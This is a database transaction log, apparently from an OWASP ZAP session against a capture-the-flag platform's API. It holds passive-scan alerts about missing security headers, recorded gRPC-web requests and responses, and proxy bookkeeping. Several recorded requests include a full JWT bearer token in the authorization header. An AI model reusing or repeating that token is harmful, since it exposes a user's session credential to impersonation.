-DELETE FROM BLOCKS WHERE BLOCK_ADDR=43 -INSERT INTO LOBS VALUES(43,1,0,44) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(44,1,'2024-03-02 03:35:13.255000',1,44,NULL,552,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=44 -INSERT INTO LOB_IDS VALUES(44,552,1,40) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(28,0,10021,'X-Content-Type-Options Header Missing',1,2,'The Anti-MIME-Sniffing header X-Content-Type-Options was not set to ''nosniff''. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','x-content-type-options','This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.\u000aAt "High" threshold this scan rule will not alert on client or server error responses.','Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to ''nosniff'' for all web pages.\u000aIf possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.','https://learn.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/gg622941(v=vs.85)\u000ahttps://owasp.org/www-community/Security_Headers',18,18,'','',693,15,3,'','10021') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(59,28,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(60,28,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(45,573,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 46 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=44 -INSERT INTO BLOCKS VALUES(44,1,0) -INSERT INTO BLOCKS VALUES(45,2147483602,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=44 -INSERT INTO LOBS VALUES(44,1,0,45) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(45,1,'2024-03-02 03:35:13.258000',1,45,NULL,573,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=45 -INSERT INTO LOB_IDS VALUES(45,573,1,40) -COMMIT -/*C3*/INSERT INTO HISTORY VALUES(19,1709346750724,1,200,1709346914670,89,'OPTIONS','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','OPTIONS https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus HTTP/1.1\u000d\u000ahost: api.cscg.live:444\u000d\u000aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\u000d\u000aAccept: */*\u000d\u000aAccept-Language: en-US,en;q=0.5\u000d\u000aAccess-Control-Request-Method: POST\u000d\u000aAccess-Control-Request-Headers: authorization,content-type,x-grpc-web,x-user-agent\u000d\u000aReferer: https://play.cscg.live/\u000d\u000aOrigin: https://play.cscg.live\u000d\u000aConnection: keep-alive\u000d\u000aSec-Fetch-Dest: empty\u000d\u000aSec-Fetch-Mode: cors\u000d\u000aSec-Fetch-Site: same-site\u000d\u000a\u000d\u000a','','HTTP/1.1 200 OK\u000d\u000aAccess-Control-Allow-Headers: content-type,accept,x-user-agent,x-grpc-web,grpc-status,grpc-message,authorization\u000d\u000aAccess-Control-Allow-Methods: GET,HEAD,POST,PUT,DELETE\u000d\u000aAccess-Control-Allow-Origin: https://play.cscg.live\u000d\u000aAlt-Svc: h3=":443"; ma=2592000\u000d\u000aContent-Length: 0\u000d\u000aDate: Sat, 02 Mar 2024 02:35:14 GMT\u000d\u000aServer: Caddy\u000d\u000a\u000d\u000a','',NULL,'',TRUE) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(46,323,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 47 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=45 -INSERT INTO BLOCKS VALUES(45,1,0) -INSERT INTO BLOCKS VALUES(46,2147483601,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=45 -INSERT INTO LOBS VALUES(45,1,0,46) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(46,1,'2024-03-02 03:35:14.760000',1,46,NULL,323,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=46 -INSERT INTO LOB_IDS VALUES(46,323,1,40) -COMMIT -/*C3*/INSERT INTO HISTORY VALUES(20,1709346750724,1,200,1709346914763,83,'POST','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','POST https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus HTTP/1.1\u000d\u000ahost: api.cscg.live:444\u000d\u000aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\u000d\u000aAccept: */*\u000d\u000aAccept-Language: en-US,en;q=0.5\u000d\u000aReferer: https://play.cscg.live/\u000d\u000aauthorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOiIzMDYwODYxNzY1ODUxNTQ1NjAiLCJleHAiOjE3MDk5MTMzMjh9.JpFHIOU8-a2WYlNV5ULXkK-u_99MLNy-igxO672RIuI\u000d\u000acontent-type: application/grpc-web+proto\u000d\u000ax-grpc-web: 1\u000d\u000ax-user-agent: connect-es/1.3.0\u000d\u000aContent-Length: 44\u000d\u000aOrigin: https://play.cscg.live\u000d\u000aConnection: keep-alive\u000d\u000aSec-Fetch-Dest: empty\u000d\u000aSec-Fetch-Mode: cors\u000d\u000aSec-Fetch-Site: same-site\u000d\u000a\u000d\u000a','00000000270a18373232653363613365393262363863656666353830336664120b696e74726f2d7765622d32','HTTP/1.1 200 OK\u000d\u000aAccess-Control-Allow-Origin: https://play.cscg.live\u000d\u000aAccess-Control-Expose-Headers: Access-Control-Allow-Origin, Vary, Content-Type, Date, grpc-status, grpc-message\u000d\u000aAlt-Svc: h3=":443"; ma=2592000\u000d\u000aContent-Type: application/grpc-web+proto\u000d\u000aServer: Caddy\u000d\u000aVary: Origin\u000d\u000aDate: Sat, 02 Mar 2024 02:35:14 GMT\u000d\u000acontent-length: 129\u000d\u000a\u000d\u000a','00000000670a1837323265336361336539326236386365666635383033666410011a49123d3732326533636133653932623638636566663538303366642d313032342d696e74726f2d7765622d322e6368616c6c656e67652e637363672e6c69766518b90a220568747470738000000010677270632d7374617475733a20300d0a',NULL,'',TRUE) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(47,322,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 48 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=46 -INSERT INTO BLOCKS VALUES(46,1,0) -INSERT INTO BLOCKS VALUES(47,2147483600,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=46 -INSERT INTO LOBS VALUES(46,1,0,47) -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=18 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Allow-Headers' AND USED=3 AND FLAGS='' AND VALS='content-type%2Caccept%2Cx-user-agent%2Cx-grpc-web%2Cgrpc-status%2Cgrpc-message%2Cauthorization' -INSERT INTO PARAM VALUES(18,'api.cscg.live:444','header','Access-Control-Allow-Headers',4,'','content-type%2Caccept%2Cx-user-agent%2Cx-grpc-web%2Cgrpc-status%2Cgrpc-message%2Cauthorization') -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(47,1,'2024-03-02 03:35:14.848000',1,47,NULL,322,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=47 -INSERT INTO LOB_IDS VALUES(47,322,1,40) -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=19 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Allow-Methods' AND USED=3 AND FLAGS='' AND VALS='GET%2CHEAD%2CPOST%2CPUT%2CDELETE' -INSERT INTO PARAM VALUES(19,'api.cscg.live:444','header','Access-Control-Allow-Methods',4,'','GET%2CHEAD%2CPOST%2CPUT%2CDELETE') -COMMIT -DELETE FROM PARAM WHERE PARAMID=1 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Allow-Origin' AND USED=13 AND FLAGS='' AND VALS='https://play.cscg.live' -INSERT INTO PARAM VALUES(1,'api.cscg.live:444','header','Access-Control-Allow-Origin',14,'','https://play.cscg.live') -COMMIT -DELETE FROM PARAM WHERE PARAMID=3 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Alt-Svc' AND USED=13 AND FLAGS='' AND VALS='h3=":443"; ma=2592000' -INSERT INTO PARAM VALUES(3,'api.cscg.live:444','header','Alt-Svc',14,'','h3=":443"; ma=2592000') -COMMIT -DELETE FROM PARAM WHERE PARAMID=20 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Content-Length' AND USED=3 AND FLAGS='' AND VALS='0' -INSERT INTO PARAM VALUES(20,'api.cscg.live:444','header','Content-Length',4,'','0') -COMMIT -DELETE FROM PARAM WHERE PARAMID=7 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Date' AND USED=13 AND FLAGS='' AND VALS='Sat%2C 02 Mar 2024 02:35:08 GMT,Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:35:03 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:35:04 GMT,Sat%2C 02 Mar 2024 02:35:12 GMT,Sat%2C 02 Mar 2024 02:35:06 GMT,Sat%2C 02 Mar 2024 02:35:11 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT' -INSERT INTO PARAM VALUES(7,'api.cscg.live:444','header','Date',14,'','Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:35:04 GMT,Sat%2C 02 Mar 2024 02:35:12 GMT,Sat%2C 02 Mar 2024 02:35:06 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT,Sat%2C 02 Mar 2024 02:35:08 GMT,Sat%2C 02 Mar 2024 02:35:03 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:35:14 GMT,Sat%2C 02 Mar 2024 02:35:11 GMT') -COMMIT -DELETE FROM PARAM WHERE PARAMID=5 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Server' AND USED=13 AND FLAGS='' AND VALS='Caddy' -INSERT INTO PARAM VALUES(5,'api.cscg.live:444','header','Server',14,'','Caddy') -COMMIT -DELETE FROM PARAM WHERE PARAMID=1 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Allow-Origin' AND USED=14 AND FLAGS='' AND VALS='https://play.cscg.live' -INSERT INTO PARAM VALUES(1,'api.cscg.live:444','header','Access-Control-Allow-Origin',15,'','https://play.cscg.live') -COMMIT -DELETE FROM PARAM WHERE PARAMID=2 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Expose-Headers' AND USED=10 AND FLAGS='' AND VALS='Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message,Content-Type%2C Access-Control-Allow-Origin%2C Vary%2C Date%2C grpc-status%2C grpc-message,Vary%2C Date%2C Content-Type%2C Access-Control-Allow-Origin%2C grpc-status%2C grpc-message' -INSERT INTO PARAM VALUES(2,'api.cscg.live:444','header','Access-Control-Expose-Headers',11,'','Access-Control-Allow-Origin%2C Vary%2C Content-Type%2C Date%2C grpc-status%2C grpc-message,Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message,Content-Type%2C Access-Control-Allow-Origin%2C Vary%2C Date%2C grpc-status%2C grpc-message,Vary%2C Date%2C Content-Type%2C Access-Control-Allow-Origin%2C grpc-status%2C grpc-message') -COMMIT -DELETE FROM PARAM WHERE PARAMID=3 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Alt-Svc' AND USED=14 AND FLAGS='' AND VALS='h3=":443"; ma=2592000' -INSERT INTO PARAM VALUES(3,'api.cscg.live:444','header','Alt-Svc',15,'','h3=":443"; ma=2592000') -COMMIT -DELETE FROM PARAM WHERE PARAMID=4 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Content-Type' AND USED=10 AND FLAGS='' AND VALS='application/grpc-web+proto' -INSERT INTO PARAM VALUES(4,'api.cscg.live:444','header','Content-Type',11,'','application/grpc-web+proto') -COMMIT -DELETE FROM PARAM WHERE PARAMID=5 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Server' AND USED=14 AND FLAGS='' AND VALS='Caddy' -INSERT INTO PARAM VALUES(5,'api.cscg.live:444','header','Server',15,'','Caddy') -COMMIT -DELETE FROM PARAM WHERE PARAMID=6 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Vary' AND USED=10 AND FLAGS='' AND VALS='Origin' -INSERT INTO PARAM VALUES(6,'api.cscg.live:444','header','Vary',11,'','Origin') -COMMIT -DELETE FROM PARAM WHERE PARAMID=7 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Date' AND USED=14 AND FLAGS='' AND VALS='Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:35:04 GMT,Sat%2C 02 Mar 2024 02:35:12 GMT,Sat%2C 02 Mar 2024 02:35:06 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT,Sat%2C 02 Mar 2024 02:35:08 GMT,Sat%2C 02 Mar 2024 02:35:03 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:35:14 GMT,Sat%2C 02 Mar 2024 02:35:11 GMT' -INSERT INTO PARAM VALUES(7,'api.cscg.live:444','header','Date',15,'','Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:35:04 GMT,Sat%2C 02 Mar 2024 02:35:12 GMT,Sat%2C 02 Mar 2024 02:35:06 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT,Sat%2C 02 Mar 2024 02:35:08 GMT,Sat%2C 02 Mar 2024 02:35:03 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:35:14 GMT,Sat%2C 02 Mar 2024 02:35:11 GMT') -COMMIT -/*C5*/INSERT INTO ALERT VALUES(29,0,10035,'Strict-Transport-Security Header Not Set',1,3,'HTTP Strict Transport Security (HSTS) is a web security policy mechanism whereby a web server declares that complying user agents (such as a web browser) are to interact with it using only secure HTTPS connections (i.e. HTTP layered over TLS/SSL). HSTS is an IETF standards track protocol and is specified in RFC 6797.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','','','Ensure that your web server, application server, load balancer, etc. is configured to enforce Strict-Transport-Security.','https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html\u000ahttps://owasp.org/www-community/Security_Headers\u000ahttps://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security\u000ahttps://caniuse.com/stricttransportsecurity\u000ahttps://datatracker.ietf.org/doc/html/rfc6797',20,20,'','',319,15,3,'','10035-1') -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=8 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='content-length' AND USED=10 AND FLAGS='' AND VALS='129' -INSERT INTO PARAM VALUES(8,'api.cscg.live:444','header','content-length',11,'','129') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(61,29,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(62,29,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(48,552,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 49 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=47 -INSERT INTO BLOCKS VALUES(47,1,0) -INSERT INTO BLOCKS VALUES(48,2147483599,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=47 -INSERT INTO LOBS VALUES(47,1,0,48) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(30,0,10035,'Strict-Transport-Security Header Not Set',1,3,'HTTP Strict Transport Security (HSTS) is a web security policy mechanism whereby a web server declares that complying user agents (such as a web browser) are to interact with it using only secure HTTPS connections (i.e. HTTP layered over TLS/SSL). HSTS is an IETF standards track protocol and is specified in RFC 6797.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','','','Ensure that your web server, application server, load balancer, etc. is configured to enforce Strict-Transport-Security.','https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html\u000ahttps://owasp.org/www-community/Security_Headers\u000ahttps://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security\u000ahttps://caniuse.com/stricttransportsecurity\u000ahttps://datatracker.ietf.org/doc/html/rfc6797',19,19,'','',319,15,3,'','10035-1') -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(48,1,'2024-03-02 03:35:14.851000',1,48,NULL,552,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=48 -INSERT INTO LOB_IDS VALUES(48,552,1,40) -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(63,30,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(64,30,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C5*/INSERT INTO ALERT VALUES(31,0,10021,'X-Content-Type-Options Header Missing',1,2,'The Anti-MIME-Sniffing header X-Content-Type-Options was not set to ''nosniff''. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','x-content-type-options','This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.\u000aAt "High" threshold this scan rule will not alert on client or server error responses.','Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to ''nosniff'' for all web pages.\u000aIf possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.','https://learn.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/gg622941(v=vs.85)\u000ahttps://owasp.org/www-community/Security_Headers',20,20,'','',693,15,3,'','10021') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(65,31,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(66,31,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(49,552,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 50 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=48 -INSERT INTO BLOCKS VALUES(48,1,0) -INSERT INTO BLOCKS VALUES(49,2147483598,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=48 -INSERT INTO LOBS VALUES(48,1,0,49) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(49,1,'2024-03-02 03:35:14.853000',1,49,NULL,552,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=49 -INSERT INTO LOB_IDS VALUES(49,552,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(50,573,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 51 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=49 -INSERT INTO BLOCKS VALUES(49,1,0) -INSERT INTO BLOCKS VALUES(50,2147483597,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=49 -INSERT INTO LOBS VALUES(49,1,0,50) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(50,1,'2024-03-02 03:35:14.853000',1,50,NULL,573,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=50 -INSERT INTO LOB_IDS VALUES(50,573,1,40) -COMMIT -/*C3*/INSERT INTO HISTORY VALUES(21,1709346750724,1,200,1709346916670,183,'POST','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','POST https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus HTTP/1.1\u000d\u000ahost: api.cscg.live:444\u000d\u000aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\u000d\u000aAccept: */*\u000d\u000aAccept-Language: en-US,en;q=0.5\u000d\u000aReferer: https://play.cscg.live/\u000d\u000aauthorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOiIzMDYwODYxNzY1ODUxNTQ1NjAiLCJleHAiOjE3MDk5MTMzMjh9.JpFHIOU8-a2WYlNV5ULXkK-u_99MLNy-igxO672RIuI\u000d\u000acontent-type: application/grpc-web+proto\u000d\u000ax-grpc-web: 1\u000d\u000ax-user-agent: connect-es/1.3.0\u000d\u000aContent-Length: 44\u000d\u000aOrigin: https://play.cscg.live\u000d\u000aConnection: keep-alive\u000d\u000aSec-Fetch-Dest: empty\u000d\u000aSec-Fetch-Mode: cors\u000d\u000aSec-Fetch-Site: same-site\u000d\u000a\u000d\u000a','00000000270a18373232653363613365393262363863656666353830336664120b696e74726f2d7765622d32','HTTP/1.1 200 OK\u000d\u000aAccess-Control-Allow-Origin: https://play.cscg.live\u000d\u000aAccess-Control-Expose-Headers: Date, Access-Control-Allow-Origin, Vary, Content-Type, grpc-status, grpc-message\u000d\u000aAlt-Svc: h3=":443"; ma=2592000\u000d\u000aContent-Type: application/grpc-web+proto\u000d\u000aServer: Caddy\u000d\u000aVary: Origin\u000d\u000aDate: Sat, 02 Mar 2024 02:35:16 GMT\u000d\u000acontent-length: 129\u000d\u000a\u000d\u000a','00000000670a1837323265336361336539326236386365666635383033666410011a49123d3732326533636133653932623638636566663538303366642d313032342d696e74726f2d7765622d322e6368616c6c656e67652e637363672e6c69766518b90a220568747470738000000010677270632d7374617475733a20300d0a',NULL,'',TRUE) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(51,323,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 52 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=50 -INSERT INTO BLOCKS VALUES(50,1,0) -INSERT INTO BLOCKS VALUES(51,2147483596,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=50 -INSERT INTO LOBS VALUES(50,1,0,51) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(51,1,'2024-03-02 03:35:16.854000',1,51,NULL,323,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=51 -INSERT INTO LOB_IDS VALUES(51,323,1,40) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(32,0,10035,'Strict-Transport-Security Header Not Set',1,3,'HTTP Strict Transport Security (HSTS) is a web security policy mechanism whereby a web server declares that complying user agents (such as a web browser) are to interact with it using only secure HTTPS connections (i.e. HTTP layered over TLS/SSL). HSTS is an IETF standards track protocol and is specified in RFC 6797.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','','','Ensure that your web server, application server, load balancer, etc. is configured to enforce Strict-Transport-Security.','https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html\u000ahttps://owasp.org/www-community/Security_Headers\u000ahttps://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security\u000ahttps://caniuse.com/stricttransportsecurity\u000ahttps://datatracker.ietf.org/doc/html/rfc6797',21,21,'','',319,15,3,'','10035-1') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(67,32,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(68,32,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=1 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Allow-Origin' AND USED=15 AND FLAGS='' AND VALS='https://play.cscg.live' -INSERT INTO PARAM VALUES(1,'api.cscg.live:444','header','Access-Control-Allow-Origin',16,'','https://play.cscg.live') -COMMIT -DELETE FROM PARAM WHERE PARAMID=2 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Expose-Headers' AND USED=11 AND FLAGS='' AND VALS='Access-Control-Allow-Origin%2C Vary%2C Content-Type%2C Date%2C grpc-status%2C grpc-message,Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message,Content-Type%2C Access-Control-Allow-Origin%2C Vary%2C Date%2C grpc-status%2C grpc-message,Vary%2C Date%2C Content-Type%2C Access-Control-Allow-Origin%2C grpc-status%2C grpc-message' -INSERT INTO PARAM VALUES(2,'api.cscg.live:444','header','Access-Control-Expose-Headers',12,'','Date%2C Access-Control-Allow-Origin%2C Vary%2C Content-Type%2C grpc-status%2C grpc-message,Access-Control-Allow-Origin%2C Vary%2C Content-Type%2C Date%2C grpc-status%2C grpc-message,Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message,Content-Type%2C Access-Control-Allow-Origin%2C Vary%2C Date%2C grpc-status%2C grpc-message,Vary%2C Date%2C Content-Type%2C Access-Control-Allow-Origin%2C grpc-status%2C grpc-message') -COMMIT -DELETE FROM PARAM WHERE PARAMID=3 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Alt-Svc' AND USED=15 AND FLAGS='' AND VALS='h3=":443"; ma=2592000' -INSERT INTO PARAM VALUES(3,'api.cscg.live:444','header','Alt-Svc',16,'','h3=":443"; ma=2592000') -COMMIT -DELETE FROM PARAM WHERE PARAMID=4 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Content-Type' AND USED=11 AND FLAGS='' AND VALS='application/grpc-web+proto' -INSERT INTO PARAM VALUES(4,'api.cscg.live:444','header','Content-Type',12,'','application/grpc-web+proto') -COMMIT -DELETE FROM PARAM WHERE PARAMID=5 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Server' AND USED=15 AND FLAGS='' AND VALS='Caddy' -INSERT INTO PARAM VALUES(5,'api.cscg.live:444','header','Server',16,'','Caddy') -COMMIT -DELETE FROM PARAM WHERE PARAMID=6 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Vary' AND USED=11 AND FLAGS='' AND VALS='Origin' -INSERT INTO PARAM VALUES(6,'api.cscg.live:444','header','Vary',12,'','Origin') -COMMIT -DELETE FROM PARAM WHERE PARAMID=7 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Date' AND USED=15 AND FLAGS='' AND VALS='Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:35:04 GMT,Sat%2C 02 Mar 2024 02:35:12 GMT,Sat%2C 02 Mar 2024 02:35:06 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT,Sat%2C 02 Mar 2024 02:35:08 GMT,Sat%2C 02 Mar 2024 02:35:03 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:35:14 GMT,Sat%2C 02 Mar 2024 02:35:11 GMT' -INSERT INTO PARAM VALUES(7,'api.cscg.live:444','header','Date',16,'','Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:35:04 GMT,Sat%2C 02 Mar 2024 